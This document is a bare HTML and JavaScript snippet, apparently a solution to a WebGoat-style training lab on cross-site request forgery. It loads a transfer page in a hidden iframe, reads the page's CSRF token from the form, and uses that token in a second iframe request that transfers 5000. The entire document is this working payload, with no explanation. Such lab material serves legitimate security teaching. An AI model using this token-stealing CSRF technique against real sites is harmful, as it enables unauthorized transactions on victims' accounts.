<iframe src="attack?Screen=1721642316&menu=900&transfer=main" onload="first();" id="first"></iframe>
<iframe id="second"></iframe>

<script type="text/javascript">
    var token;

    function first() {
        var frame = document.getElementById("first").contentDocument;
        token = frame.getElementsByTagName("form")[0].CSRFToken.value;
        second();
    }

    function second() {
        var frame = document.getElementById("second");
        frame.src = "attack?Screen=1721642316&menu=900&transfer=5000&CSRFToken=" + token;
    }
</script>